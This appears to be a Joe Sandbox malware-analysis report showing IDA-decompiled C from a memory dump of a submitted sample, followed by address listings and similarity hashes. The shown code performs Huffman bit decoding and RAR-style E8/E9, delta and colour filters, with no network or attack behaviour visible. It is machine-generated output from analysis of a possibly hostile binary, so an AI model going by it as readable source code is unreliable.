														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E00BAA740(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x28))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x18);
														_t201 =  *(_t455 + 0x1c);
														_t293 =  *(_t455 + 0x10);
														_t443 =  *((intOrPtr*)(_t455 + 0x20));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x18);
											_t201 =  *(_t455 + 0x1c);
											_t293 =  *(_t455 + 0x10);
											continue;
										}
										_push(_t455 + 0x2c);
										E00BB38C2(_t443, _t438);
										_t295[1] =  *(_t455 + 0x2c) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x30);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x38) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x34);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x14) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E00BAA740(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x14) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E00BAA740(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x24) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x14) + 1;
												 *(_t455 + 0x14) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x14) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x14) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x28);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x14);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00BB80CA(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x24);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00BB80CA(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x24);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E00BAA740(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00BB3CDD(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x00bb69f0
0x00bb69f6
0x00bb69fe
0x00bb6a25
0x00bb6a28
0x00bb6a2e
0x00bb6a31
0x00bb6a33
0x00bb6a4b
0x00bb6a52
0x00bb6a54
0x00bb6a57
0x00bb6a5b
0x00bb6a60
0x00bb6a62
0x00bb6a64
0x00bb6a66
0x00bb6a66
0x00bb6a68
0x00bb6a6c
0x00bb6a6c
0x00bb6a6e
0x00bb6a70
0x00000000
0x00000000
0x00bb6a72
0x00bb6a72
0x00bb6a74
0x00bb6feb
0x00bb6fec
0x00000000
0x00bb6fec
0x00bb6a7a
0x00bb6a88
0x00bb6a88
0x00bb6a8a
0x00bb6a99
0x00bb6a99
0x00bb6a9f
0x00bb6fe4
0x00bb6fe4
0x00000000
0x00bb6fe4
0x00000000
0x00bb6a9f
0x00bb6a8c
0x00bb6a93
0x00000000
0x00000000
0x00000000
0x00bb6a93
0x00bb6a7c
0x00bb6a7f
0x00bb6a82
0x00000000
0x00000000
0x00000000
0x00bb6aa5
0x00bb6aa5
0x00bb6aae
0x00bb6ab4
0x00bb6ab6
0x00bb6ab9
0x00bb6ac2
0x00bb6ac3
0x00bb6ace
0x00bb6ad2
0x00bb6ad4
0x00bb6adb
0x00bb6adb
0x00bb6ae0
0x00bb6ae0
0x00bb6ae6
0x00bb6af1
0x00bb6af8
0x00bb6afc
0x00bb6b02
0x00bb6b09
0x00bb6b0f
0x00bb6b15
0x00bb6b19
0x00bb6b46
0x00bb6b47
0x00bb6b48
0x00bb6b4a
0x00bb6b63
0x00bb6b66
0x00bb6b6d
0x00bb6b70
0x00bb6b73
0x00bb6b7b
0x00bb6b84
0x00bb6b88
0x00bb6b8a
0x00bb6b8d
0x00bb6b8f
0x00bb6b8f
0x00bb6b91
0x00000000
0x00bb6b91
0x00bb6b4f
0x00bb6b52
0x00bb6b52
0x00bb6b54
0x00000000
0x00000000
0x00bb6b56
0x00bb6b57
0x00bb6b5a
0x00bb6b5d
0x00000000
0x00000000
0x00000000
0x00bb6b5f
0x00bb6b61
0x00000000
0x00bb6b1b
0x00bb6b1d
0x00bb6b20
0x00bb6b2a
0x00bb6b32
0x00bb6b37
0x00bb6b3a
0x00bb6b99
0x00bb6b9e
0x00bb6ba0
0x00bb6bee
0x00bb6bf4
0x00bb6e67
0x00bb6e69
0x00bb6eba
0x00bb6ec0
0x00bb6ecf
0x00bb6ed0
0x00bb6eda
0x00bb6edd
0x00bb6ee4
0x00bb6eea
0x00bb6ef0
0x00bb6ef7
0x00bb6f24
0x00bb6f25
0x00bb6f26
0x00bb6f28
0x00bb6f44
0x00bb6f47
0x00bb6f4e
0x00bb6f51
0x00bb6f54
0x00bb6f5f
0x00bb6f6b
0x00bb6f6d
0x00bb6f73
0x00bb6f75
0x00bb6f75
0x00bb6f77
0x00bb6f7f
0x00bb6f7f
0x00bb6f82
0x00bb6f85
0x00bb6f93
0x00bb6f96
0x00bb6f9e
0x00bb6fa1
0x00bb6fa3
0x00bb6fa7
0x00bb6fae
0x00bb6fb6
0x00bb6fb8
0x00bb6fbf
0x00bb6fc1
0x00bb6fc1
0x00bb6fc4
0x00bb6fc4
0x00bb6f87
0x00bb6f87
0x00bb6f87
0x00bb6fcb
0x00bb6fcf
0x00bb6fcf
0x00bb6fd3
0x00bb6fd7
0x00bb6fdb
0x00bb6a6c
0x00bb6a6c
0x00bb6a6e
0x00bb6a70
0x00000000
0x00000000
0x00000000
0x00bb6a70
0x00bb6a6c
0x00bb6f30
0x00bb6f33
0x00bb6f33
0x00bb6f35
0x00000000
0x00000000
0x00bb6f37
0x00bb6f38
0x00bb6f3b
0x00bb6f3e
0x00000000
0x00000000
0x00000000
0x00bb6f40
0x00bb6f42
0x00000000
0x00bb6f42
0x00bb6efb
0x00bb6efe
0x00bb6f08
0x00bb6f10
0x00bb6f15
0x00bb6f18
0x00000000
0x00bb6f18
0x00bb6ec2
0x00bb6bcf
0x00bb6bcf
0x00bb6bd3
0x00bb6bd7
0x00000000
0x00bb6bd7
0x00bb6e71
0x00bb6e73
0x00bb6e7d
0x00bb6e85
0x00bb6e8a
0x00bb6e8b
0x00bb6e8d
0x00bb6e96
0x00bb6e9d
0x00bb6ea8
0x00bb6eb0
0x00bb6eb2
0x00000000
0x00bb6eb2
0x00bb6bfa
0x00bb6c00
0x00bb6c03
0x00bb6c10
0x00bb6c13
0x00bb6c19
0x00bb6c19
0x00bb6c05
0x00bb6c05
0x00bb6c05
0x00bb6c1b
0x00bb6c1e
0x00bb6c22
0x00bb6c24
0x00bb6c28
0x00bb6c2f
0x00bb6c39
0x00bb6c3b
0x00bb6c44
0x00bb6c46
0x00bb6c46
0x00bb6c49
0x00bb6c49
0x00bb6c4e
0x00bb6c55
0x00bb6c5b
0x00bb6c61
0x00bb6c68
0x00bb6c95
0x00bb6c96
0x00bb6c97
0x00bb6c99
0x00bb6cb5
0x00bb6cb8
0x00bb6cbf
0x00bb6cc2
0x00bb6cc5
0x00bb6cd0
0x00bb6cdc
0x00bb6cde
0x00bb6ce4
0x00bb6ce6
0x00bb6ce6
0x00bb6ce8
0x00000000
0x00bb6ce8
0x00bb6ca1
0x00bb6ca4
0x00bb6ca4
0x00bb6ca6
0x00000000
0x00000000
0x00bb6ca8
0x00bb6ca9
0x00bb6cac
0x00bb6caf
0x00000000
0x00000000
0x00000000
0x00bb6cb1
0x00bb6cb3
0x00000000
0x00bb6c6a
0x00bb6c6c
0x00bb6c6f
0x00bb6c79
0x00bb6c81
0x00bb6c86
0x00bb6c89
0x00bb6cf0
0x00bb6cf0
0x00bb6cf3
0x00bb6cf6
0x00bb6d06
0x00bb6d09
0x00bb6d09
0x00bb6cf8
0x00bb6cf8
0x00bb6cf8
0x00bb6d0b
0x00bb6d0c
0x00bb6d10
0x00bb6d12
0x00bb6d14
0x00bb6e22
0x00bb6e22
0x00bb6e28
0x00bb6e2e
0x00bb6e2f
0x00bb6e33
0x00bb6e39
0x00bb6e3b
0x00bb6e3c
0x00bb6e40
0x00bb6e46
0x00bb6e48
0x00bb6e48
0x00bb6e49
0x00bb6e49
0x00bb6e46
0x00bb6e39
0x00bb6e4d
0x00bb6e55
0x00bb6e5b
0x00bb6e5f
0x00000000
0x00bb6d1a
0x00bb6d1a
0x00bb6d1d
0x00bb6dfe
0x00bb6e07
0x00bb6e0f
0x00bb6e13
0x00bb6e1a
0x00bb6e1c
0x00bb6e1c
0x00bb6e1f
0x00000000
0x00bb6e1f
0x00bb6d23
0x00bb6d27
0x00bb6d30
0x00bb6d3e
0x00bb6d42
0x00bb6d49
0x00bb6d4b
0x00bb6d4b
0x00bb6d4e
0x00bb6d4e
0x00bb6d53
0x00bb6d5a
0x00bb6d60
0x00bb6d66
0x00bb6d6d
0x00bb6d9a
0x00bb6d9b
0x00bb6d9c
0x00bb6d9e
0x00bb6dba
0x00bb6dbd
0x00bb6dc4
0x00bb6dc7
0x00bb6dca
0x00bb6dd5
0x00bb6de1
0x00bb6de3
0x00bb6de9
0x00bb6deb
0x00bb6deb
0x00bb6ded
0x00000000
0x00bb6ded
0x00bb6da6
0x00bb6da9
0x00bb6da9
0x00bb6dab
0x00000000
0x00000000
0x00bb6dad
0x00bb6dae
0x00bb6db1
0x00bb6db4
0x00000000
0x00000000
0x00000000
0x00bb6db6
0x00bb6db8
0x00000000
0x00bb6d6f
0x00bb6d71
0x00bb6d74
0x00bb6d7e
0x00bb6d86
0x00bb6d8b
0x00bb6d8e
0x00bb6df5
0x00bb6df8
0x00000000
0x00bb6df8
0x00bb6d6d
0x00bb6d14
0x00bb6c68
0x00bb6ba2
0x00bb6ba9
0x00bb6be0
0x00bb6be0
0x00bb6be5
0x00bb6be8
0x00000000
0x00bb6be8
0x00bb6bab
0x00bb6baf
0x00000000
0x00000000
0x00bb6bb1
0x00bb6bb7
0x00bb6bb8
0x00bb6bbb
0x00000000
0x00000000
0x00bb6bbd
0x00bb6bbe
0x00bb6bc5
0x00bb6bc9
0x00bb6bc9
0x00bb6bc9
0x00000000
0x00bb6bc9
0x00bb6b19
0x00bb6a6c
0x00bb6a35
0x00000000
0x00bb6a00
0x00bb6a03
0x00bb6a07
0x00bb6a0b
0x00bb6a0f
0x00bb6a10
0x00bb6a17
0x00000000
0x00bb6a19
0x00bb6a19
0x00000000
0x00bb6a19
0x00bb6a17

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f765c18561e945e3896753609a06d308791c0f0593babc2d30ae767a510cf38
Instruction ID: 11a2f4bcc7357366bcfa736fbd111bd9890517708a968cb3aee0774e14fbb1b7
Opcode Fuzzy Hash: 7f765c18561e945e3896753609a06d308791c0f0593babc2d30ae767a510cf38
Instruction Fuzzy Hash: EF12C0B16047068BCB28CF28D8D06B9B7E1FF54308F14896EE597C7A81D7B8E895CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00BABD53 Relevance: .4, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BABD53(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				char _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed char _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed char _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *((char*)(_t355 + 0x13)) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *((intOrPtr*)(_t355 + 0x13));
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x2c) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x38) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0xbdd070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x2c);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *(_t355 + 0x34) = 0;
						 *(_t355 + 0x40) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E00BAC2BC(_t277, _t175, 4) == 5) {
									E00BAC307(_t277, E00BAC2BC(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x3c);
								_t285 =  *(_t355 + 0x30);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x30) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x38);
						_t316 =  *(_t355 + 0x2c);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x2c) = _t316;
						 *(_t355 + 0x38) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x20) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x30) = _t289;
					 *(_t355 + 0x3c) = _t278;
					 *(_t355 + 0x44) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x2c) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x18) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x24) = 0;
						 *(_t355 + 0x14) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x20);
							_t221 =  *(_t355 + 0x3c) - _t351;
							_t352 =  *(_t355 + 0x3c);
							 *(_t355 + 0x28) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x38) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x34) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x44) = E00BC572A(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x28) = E00BC572A(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t234 = E00BC572A(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t292 =  *((intOrPtr*)(_t355 + 0x4c));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x1c);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
										_t279 =  *(_t355 + 0x38);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x34);
										}
									} else {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
									}
								}
								_t223 =  *(_t355 + 0x2c);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x2c) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x28);
							} while ( &(_t334[ *(_t355 + 0x28)]) < _t289);
							_t351 =  *(_t355 + 0x18);
							_t218 =  *(_t355 + 0x24);
							_t319 =  *(_t355 + 0x14);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x24) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x44);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x34) = _t293;
					 *(_t355 + 0x38) = _t235;
					 *(_t355 + 0x40) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x3c) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x28) =  *(_t355 + 0x28) & 0x00000000;
							 *(_t355 + 0x24) =  *(_t355 + 0x24) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0;
							 *(_t355 + 0x24) = 0;
							E00BBF1A0(_t336, _t355 + 0x48, 0, 0x1c);
							 *(_t355 + 0x3c) =  *(_t355 + 0x3c) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x2c) = _t336;
							if(_t336 <  *(_t355 + 0x38)) {
								_t238 =  *(_t355 + 0x14);
								do {
									_t322 =  *(_t355 + 0x24);
									 *(_t355 + 0x1c) = _t322 -  *(_t355 + 0x20);
									_t297 =  *(_t355 + 0x34);
									 *(_t355 + 0x20) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x34) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x1c) * _t238 + _t345 *  *(_t355 + 0x1c) + _t353 *  *(_t355 + 0x24) +  *(_t355 + 0x28) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x2c) +  *(_t355 + 0x40)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x28) = _t304 -  *(_t355 + 0x28);
									 *(_t355 + 0x2c) = _t304;
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00BC572A(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00BC572A(_t323, (_t323 << 3) -  *(_t355 + 0x24));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00BC572A(_t323,  *(_t355 + 0x28) + (_t323 << 3));
